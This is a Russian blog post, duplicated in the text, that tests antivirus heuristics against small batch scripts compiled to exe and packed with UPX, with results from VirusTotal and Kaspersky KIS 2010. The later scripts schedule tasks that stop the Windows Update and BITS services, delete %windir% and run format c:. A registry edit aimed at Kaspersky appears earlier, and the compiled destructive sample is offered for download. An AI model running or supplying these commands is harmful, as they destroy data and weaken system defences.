Привет всем!
Надеюсь, кому-то приведённые мной обзоры показались интересными. Продолжим! Сегодня я долго думал что бы написать. Идей не оказалось, кроме небольшой обиды на «Лабораторию Касперского», но это уже неважно и это уже почти лично-интимное.
Итак, сегодня я хочу подёргать за первичные половые признаки эвристику некоторых антивирусов. You CAN try this at home! ;) Как это обычно бывает, результаты оказались удивительными.
Что нам надо:
1. Блокнот ака Notepad.
2. Quick Batch Compiler.
3. UPX.
Итак, создаём вот такой bat-файлик:
Почему я выбрал именно этот параметр реестра — пусть останется загадкой. Скажу так: упор был на Касперского. Ищущий в Гугле да обрящет :)
Компилим с помощью Quick Batch Compiler в exe, при чём доупаковываем в файл мусор в upx.exe и упаковываем upx.
Сейчас глянем, что думают вендоры о пустышке. Надеюсь, все заметили rem в файлике и не сомневаются в том, что он — пустышка? Как и следовало ожидать — только Авира ругнулась, но то в её духе. Каспер не оправдал надежды и выглядит молодцом.
Усложняем задачу:
и получаем немедленный дополнительный «гав» от Симантека.
Начинаем взрослеть — rem исчезают, но службы всё равно только передёргиваются:
Но антивирусы в этом плане абсолютно безразличны — картина та же.
Убиваем службы, потенциально открывая дырки на машине:
Антивирям всё равно.
Всё, насмеялись — шутки в сторону:
Скомпиленный файл этого добра тут (пароль virus).
И теперь самое забавное: мой локальный КИС 2010 выдал вот такой алерт:
Однако на ВТ Касперский молчит, как молдавский партизан, зато преинтереснейшая картина с другими антивирусами: даже пара детектов основана на сигнатурной базе, не на эвристике (heur, gen, suspicious и т.д.)
Стоит заремить опасный код (тут компиленный файл, пароль тот же): Касперский уже молчит (честь и хвала! умница!), однако другие антивири по-прежнему видят угрозу, которая на самом деле — мусор.
Но куда интереснее будет, когда я пытаюсь выполнить сканирование файла и лечение с помощью Касперского. Начнём с того, что детекта было два: от сканера и от резидента. Дальше начинается «битва титанов» из одного лагеря. В итоге, видим следующее:
(хм, убрать задание, запустить службы и удалить файл требует ребут? ну может быть....)
(380 чего? градусов в окружности? или страшных символов в моём бат-файле?)
(так мы здоровы или нет???)
Но в конце концов всё заканчивается, и милый сердцу КИС 2010 сообщает, что активные угрозы отсутствуют. Опасность миновала! ;)
Итого, что я для себя решил.
1. Детекты, а тем более типа heur, gen, suspicious и т.д. на ВТ — это далеко не факт, что зловред. Мы рассматривали минимальный код, и тот вызвал страх, что же будет с серьёзной программой?
2. Эвристик Касперского понимает, что такое ремарки, а что — активный код. Другие — не очень :)
3. Авира как страдала паранойей — так и страдает дальше. С другой стороны — она детектирует очень много вирусов. даже больше, чем их есть на самом деле :)
4. КИС 2010 со всеми его прелестями и плюсами — очень бажный продукт. Ждём 2011!! (хотя надежд мало, но лучше при моих запросах пока не сыскать).
Надеюсь, кому-то приведённые мной обзоры показались интересными. Продолжим! Сегодня я долго думал что бы написать. Идей не оказалось, кроме небольшой обиды на «Лабораторию Касперского», но это уже неважно и это уже почти лично-интимное.
Итак, сегодня я хочу подёргать за первичные половые признаки эвристику некоторых антивирусов. You CAN try this at home! ;) Как это обычно бывает, результаты оказались удивительными.
Что нам надо:
1. Блокнот ака Notepad.
2. Quick Batch Compiler.
3. UPX.
Итак, создаём вот такой bat-файлик:
md "%temp%\123456"
echo rem reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847 /v Blob /t REG_BINARY /d 00 > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"Почему я выбрал именно этот параметр реестра — пусть останется загадкой. Скажу так: упор был на Касперского. Ищущий в Гугле да обрящет :)
Компилим с помощью Quick Batch Compiler в exe, при чём доупаковываем в файл мусор в upx.exe и упаковываем upx.
Сейчас глянем, что думают вендоры о пустышке. Надеюсь, все заметили rem в файлике и не сомневаются в том, что он — пустышка? Как и следовало ожидать — только Авира ругнулась, но то в её духе. Каспер не оправдал надежды и выглядит молодцом.
Усложняем задачу:
md "%temp%\123456"
echo rem net stop wuauserv > "%temp%\123456\1.bat"
echo rem net start wuauserv > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"и получаем немедленный дополнительный «гав» от Симантека.
Начинаем взрослеть — rem исчезают, но службы всё равно только передёргиваются:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net start wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
echo net start BITS > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"Но антивирусы в этом плане абсолютно безразличны — картина та же.
Убиваем службы, потенциально открывая дырки на машине:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"Антивирям всё равно.
Всё, насмеялись — шутки в сторону:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
echo rd %windir% /s /q > "%temp%\123456\1.bat"
echo format c: > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"Скомпиленный файл этого добра тут (пароль virus).
И теперь самое забавное: мой локальный КИС 2010 выдал вот такой алерт:
Однако на ВТ Касперский молчит, как молдавский партизан, зато преинтереснейшая картина с другими антивирусами: даже пара детектов основана на сигнатурной базе, не на эвристике (heur, gen, suspicious и т.д.)
Стоит заремить опасный код (тут компиленный файл, пароль тот же): Касперский уже молчит (честь и хвала! умница!), однако другие антивири по-прежнему видят угрозу, которая на самом деле — мусор.
Но куда интереснее будет, когда я пытаюсь выполнить сканирование файла и лечение с помощью Касперского. Начнём с того, что детекта было два: от сканера и от резидента. Дальше начинается «битва титанов» из одного лагеря. В итоге, видим следующее:
(хм, убрать задание, запустить службы и удалить файл требует ребут? ну может быть....)
(380 чего? градусов в окружности? или страшных символов в моём бат-файле?)
(так мы здоровы или нет???)
Но в конце концов всё заканчивается, и милый сердцу КИС 2010 сообщает, что активные угрозы отсутствуют. Опасность миновала! ;)
Итого, что я для себя решил.
1. Детекты, а тем более типа heur, gen, suspicious и т.д. на ВТ — это далеко не факт, что зловред. Мы рассматривали минимальный код, и тот вызвал страх, что же будет с серьёзной программой?
2. Эвристик Касперского понимает, что такое ремарки, а что — активный код. Другие — не очень :)
3. Авира как страдала паранойей — так и страдает дальше. С другой стороны — она детектирует очень много вирусов. даже больше, чем их есть на самом деле :)
4. КИС 2010 со всеми его прелестями и плюсами — очень бажный продукт. Ждём 2011!! (хотя надежд мало, но лучше при моих запросах пока не сыскать).
